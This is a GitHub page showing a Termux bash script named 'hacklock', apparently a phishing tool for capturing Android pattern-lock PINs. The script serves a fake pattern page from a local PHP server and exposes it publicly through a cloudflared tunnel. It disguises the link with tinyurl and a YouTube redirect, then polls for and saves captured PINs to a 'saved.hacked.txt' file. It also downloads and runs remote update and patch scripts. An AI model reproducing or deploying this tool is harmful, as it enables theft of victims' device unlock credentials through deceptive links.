-
Notifications
You must be signed in to change notification settings - Fork 168
/
hacklock.sh
279 lines (255 loc) · 9.53 KB
/
hacklock.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
#!data/datacom.termux/files/usr/bin/bash
# HACKLOCK V2.0
########### BY NITRO ###########
# This Tool Is For Android #
# Pattern Penetraion testing #
# web: www.noob-hackers.com #
# You can copy but give credits#
# Any feedback start issue #
######---Noob Hackers----######
####### Checks if setup file exists #######
clear
loc=/data/data/com.termux/files/home/hacklock/setup
if [ -f "$loc" ]; then
cd $HOME/hacklock
bash setup
fi
clear
####### Check if update available #######
check(){
if wget --spider https://raw.githubusercontent.com/noob-hackers/hacklock/master/update.v1.4 2>/dev/null; then
cd $HOME/hacklock/core/update
echo "pin" > update.txt
else
echo
fi
}
check
####### Update file execute #######
option(){
if [ -f "$HOME/hacklock/core/update/update.txt" ];then
cd $HOME/hacklock/core/update
bash update.sh
else
echo " "
fi
}
option
####### Check patch updates #######
check1(){
if wget --spider https://raw.githubusercontent.com/noob-hackers/patchupdateznh/main/hacklockpatch.v.1 2>/dev/null; then
cd $HOME/hacklock/core/update
echo "ttttt" > patch.txt
else
echo
fi
}
check1
####### Execute downloaded patch file #######
option1(){
if [ -f "$HOME/mrphish/core/update/patch.txt" ];then
cd $HOME/hacklock/core/update
bash patch.sh
else
echo " "
fi
}
option1
####### Check if the pacages available #######
dependencies() {
command -v php > /dev/null 2>&1 || { echo >&2 "I require Php but it's not installed. Install it. Aborting."; exit 1; }
command -v curl > /dev/null 2>&1 || { echo >&2 "I require Curl but it's not installed. Install it. Aborting."; exit 1; }
command -v wget > /dev/null 2>&1 || { echo >&2 "I require Wget but it's not installed. Install it. Aborting."; exit 1; }
}
####### Menu of the tool #######
menu() {
printf "\e[1;92m[\e[0m\e[1;77m1\e[0m\e[1;92m]\e[0m\e[1;93m Check pattern\e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m2\e[0m\e[1;92m]\e[0m\e[1;93m More Tools\e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m3\e[0m\e[1;92m]\e[0m\e[1;93m Chat\e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m4\e[0m\e[1;92m]\e[0m\e[1;93m Fix \e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m5\e[0m\e[1;92m]\e[0m\e[1;93m Follow\e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m6\e[0m\e[1;92m]\e[0m\e[1;93m Update\e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m7\e[0m\e[1;92m]\e[0m\e[1;93m About \e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m8\e[0m\e[1;92m]\e[0m\e[1;93m Subscribe\e[0m\n"
printf "\e[1;92m[\e[0m\e[1;77m9\e[0m\e[1;92m]\e[0m\e[1;93m Exit\e[0m\n"
read -p $'\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Choose an option: \e[0m' option
if [[ $option == 1 || $option == 01 ]]; then
server="pattern"
start1
elif [[ $option == 2 || $option == 02 ]]; then
am start -a android.intent.action.VIEW -d https://bit.ly/3aP8DJD > /dev/null 2>&1
elif [[ $option == 3 || $option == 03 ]]; then
am start -a android.intent.action.VIEW -d https://bit.ly/nhwhatschat > /dev/null 2>&1
elif [[ $option == 4 || $option == 04 ]]; then
fixer
elif [[ $option == 5 || $option == 05 ]]; then
am start -a android.intent.action.VIEW -d https://bit.ly/nhfollowus > /dev/null 2>&1
elif [[ $option == 6 || $option == 06 ]]; then
cd $HOME/hacklock/core/update/
bash update.sh
elif [[ $option == 7 || $option == 07 ]]; then
cd $HOME/hacklock/core/about/
bash about.sh
elif [[ $option == 8 || $option == 08 ]]; then
am start -a android.intent.action.VIEW -d https://bitly.com/nhytchannel > /dev/null 2>&1
elif [[ $option == 9 ]]; then
exit 1
else
printf "\e[1;93m [!] Invalid option!\e[0m\n"
sleep 1
clear
banner
dependencies
menu
fi
}
####### Stop background execution #######
stop() {
checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
checkphp=$(ps aux | grep -o "php" | head -n1)
checkcloud=$(ps aux | grep -o "cloudflared" | head -n1)
checkproot=$(ps aux | grep -o "proot" | head -n1)
if [[ $checkngrok == *'ngrok'* ]]; then
pkill -f -2 ngrok > /dev/null 2>&1
killall -2 ngrok > /dev/null 2>&1
fi
if [[ $checkphp == *'php'* ]]; then
pkill -f -2 php > /dev/null 2>&1
killall -2 php > /dev/null 2>&1
fi
if [[ $checkproot == *'proot'* ]]; then
pkill -f -2 proot > /dev/null 2>&1
killall -2 proot > /dev/null 2>&1
fi
if [[ $checkcloud == *'cloudflared'* ]]; then
pkill -f -2 cloudflared > /dev/null 2>&1
killall cloudflared > /dev/null 2>&1
fi
if [[ -e sendlink ]]; then
rm -rf sendlink
fi
}
####### Banner for interface #######
banner() {
printf "\n"
printf "\e[1;92m _| _| _| _| _|\e[0m\n"
printf "\e[1;92m _| _| _|_|_| _|_|_| _| _| _| _|_| _|_|_| _| _| \e[0m\n"
printf "\e[1;92m _|_|_|_| _| _| _| _|_| _| _| _| _| _|_\e[0m\n"
printf "\e[1;92m _| _| _| _| _| _| _| _| _| _| _| _| _|\e[0m\n"
printf "\e[1;92m _| _| _|_|_| _|_|_| _| _| _|_|_|_| _|_| _|_|_| _| _| v2.0 \e[0m\n"
printf "\n"
printf " \e[104m\e[1;77m >> Script By N17R0 << \e[0m\n"
printf "\n"
printf " \e[100m\e[1;77m >> Youtube Channel : \e[1;96m Noob Hackers \e[100m\e[1;77m << \e[0m\n"
printf "\n"
}
####### Catch creds #######
catch_cred() {
IFS=$'\n'
password=$(grep -o 'password : .*' $HOME/hacklock/core/pattern/usernames.txt | cut -d ":" -f2)
printf "\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m]\e[0m\e[1;92m Pattern-pin:\e[0m\e[1;77m %s\n\e[0m" $password
cat $HOME/hacklock/core/pattern/usernames.txt >> $HOME/hacklock/core/pattern/saved.hacked.txt
printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Saved:\e[0m\e[1;77m core/main/saved.hacked.txt\e[0m\n"
printf "\n"
printf "\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m] Waiting For Next Pin, Press Ctrl + C to exit...\e[0m\n"
}
####### Server start/run #######
start() {
if [[ -e "$HOME/hacklock/core/pattern/ip.txt" ]]; then
rm -rf $HOME/hacklock/core/pattern/ip.txt
fi
if [[ -e "$HOME/hacklock/core/pattern/usernames.txt" ]]; then
rm -rf $HOME/hacklock/core/pattern/usernames.txt
fi
if [[ -e "$HOME/hacklock/cloudflare-log" ]]; then
rm -rf $HOME/hacklock/cloudflare-log
fi
if [[ -e "$HOME/hacklock/ngrok" ]]; then
echo " "
else
cd $HOME/hacklock
printf "\e[1;92m[\e[0m*\e[1;92m] Downloading Ngrok...\n"
##### NGROK HAS BEEN DISABLED DUE TO SOME TERMS AND CONDITIONs wget -O ngrok https://github.com/noob-hackers/mrphish/raw/master/core/ngrok > /dev/null 2>&1
sleep 20
if [[ -e "$HOME/hacklock/ngrok" ]]; then
##### NGROK HAS BEEN DISABLED DUE TO SOME TERMS AND CONDITIONs chmod +x ngrok
sleep 2.0
printf "\e[1;92m[\e[0m*\e[1;92m] Ngrok downloaded successfully.\n"
else
printf "\e[1;93m[!] Download error... \e[0m\n"
exit 1
fi
fi
if [[ -e "$HOME/hacklock/cloudflared" ]]; then
echo " "
else
cd $HOME/hacklock
printf "\e[1;92m[\e[0m*\e[1;92m] Downloading Cloudflare...\n"
wget -O cloudflared https://github.com/cloudflare/cloudflared/releases/download/2021.10.3/cloudflared-linux-arm64 > /dev/null 2>&1
sleep 20
if [[ -e "$HOME/hacklock/cloudflared" ]]; then
chmod +x cloudflared
sleep 2.0
printf "\e[1;92m[\e[0m*\e[1;92m] cloudflare downloaded successfully.\n"
else
printf "\e[1;93m[!] Download error... \e[0m\n"
exit 1
fi
fi
####### Server start process #######
printf "\e[1;92m[\e[0m*\e[1;92m] Starting php server...\n"
cd $HOME/hacklock/core/pattern && php -S 127.0.0.1:5678 > /dev/null 2>&1 &
sleep 5
printf "\e[1;92m[\e[0m*\e[1;92m] Starting forward servers...\n"
./ngrok http 127.0.0.1:5678 > /dev/null 2>&1 &
termux-chroot ./cloudflared -url 127.0.0.1:5678 --logfile $HOME/hacklock/cloudflare-log > /dev/null 2>&1 &
sleep 20
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9A-Za-z.-]*\.ngrok.io")
flare=$(grep -o 'https://[-0-9a-z]*.trycloudflare.com' "$HOME/hacklock/cloudflare-log")
##### NGROK HAS BEEN DISABLED DUE TO SOME TERMS AND CONDITIONsprintf "\e[1;92m[\e[0m*\e[1;92m] (NGROK) link:\e[0m\e[1;77m %s\e[0m\n" $link
printf "\e[1;92m[\e[0m*\e[1;92m] (Cloud Flare) link:\e[0m\e[1;77m %s\e[0m\n" $flare
##### NGROK HAS BEEN DISABLED DUE TO SOME TERMS AND CONDITIONs ngrok_ip=$(curl -s "http://tinyurl.com/api-create.php?url=https://www.youtube.com/redirect?v=636B9Qh-fqU&redir_token=j8GGFy4s0H5jIRVfuChglne9fQB8MTU4MjM5MzM0N0AxNTgyMzA2OTQ3&event=video_description&q=$link" | head -n1)
##### NGROK HAS BEEN DISABLED DUE TO SOME TERMS AND CONDITIONs printf '\n\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m] Ngrok Short:\e[0m\e[1;77m %s \n' $ngrok_ip
cloud_ip=$(curl -s "http://tinyurl.com/api-create.php?url=https://www.youtube.com/redirect?v=636B9Qh-fqU&redir_token=j8GGFy4s0H5jIRVfuChglne9fQB8MTU4MjM5MzM0N0AxNTgyMzA2OTQ3&event=video_description&q=$flare" | head -n1)
printf '\n\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m] Cloud Short:\e[0m\e[1;77m %s \n' $cloud_ip
printf "\n"
checkfound
}
####### Remove sendlink file #######
start1() {
if [[ -e sendlink ]]; then
rm -rf sendlink
fi
start
}
####### Fix ngrok issue #######
fixer(){
clear
cd $HOME
ls -a >/dev/null 2>&1
rm -rf .ngrok2 >/dev/null 2>&1
printf "\e[1;92m WATCH THIS VIDEO www.noob-hackers.com\e[0m\n"
read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] NGROK AUTH CODE : \e[0m' name
./ngrok authtoken $name >/dev/null 2>&1
printf "\e[1;92m[\e[0m*\e[1;92m] NGROK FIXED SUCCESSFULLY:\e[0m\e[1;77m %s\e[0m\n"
printf "\e[1;92m[\e[0m*\e[1;92m] IF ITS NOT SOLVED THEN USE OPTION CHAT\e[0m\e[1;77m %s\e[0m\n"
sleep 6.0
exit 1
}
####### Check found data #######
checkfound() {
printf "\n"
printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Waiting For Pin,\e[0m\e[1;77m Press Ctrl + C to exit...\e[0m\n"
while [ true ]; do
if [[ -e "$HOME/hacklock/core/pattern/usernames.txt" ]]; then
printf "\n\e[1;93m[\e[0m*\e[1;93m]\e[0m\e[1;92m Pattern Found!\n"
catch_cred
rm -rf $HOME/hacklock/core/pattern/usernames.txt
fi
sleep 0.5
done
}
####### Restart the tool #######
banner
dependencies
menu